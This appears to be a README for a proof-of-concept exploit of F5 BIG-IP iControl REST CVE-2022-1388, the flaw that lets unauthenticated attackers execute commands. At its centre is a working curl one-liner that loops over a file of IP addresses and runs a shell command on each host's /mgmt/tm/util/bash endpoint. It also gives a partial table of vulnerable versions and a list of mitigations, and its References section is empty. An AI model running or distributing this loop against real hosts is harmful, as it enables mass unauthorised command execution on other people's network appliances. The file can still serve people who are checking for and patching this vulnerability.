# BIG-IP iControl REST vulnerability CVE-2022-1388 PoC


This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services

## PoC

You can use the following curl one liner to check for the F5 Big-IP vulnerability or use the provided python script.

cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done

## Vulnerable Versions (Big-IP)

| Branch | Vulnerable Versions | Fixes Introduced |
| ---- | ----| ---- |
|11.x|11.6.1-11.6.5|No Fix|
|12.x|12.1.0-12.1.6|No Fix|

## Mitigation

  <li>Upgrade to the fixed version in ```Fixes Introduced``` Column. (Preferred Method)</li>
  <li>Block iControl REST access through the self IP address</li>
  <li>Block iControl REST access through the management interface</li>
  <li>Modify the BIG-IP httpd configuration</li>

For more information about mitigation check out the references. 

## References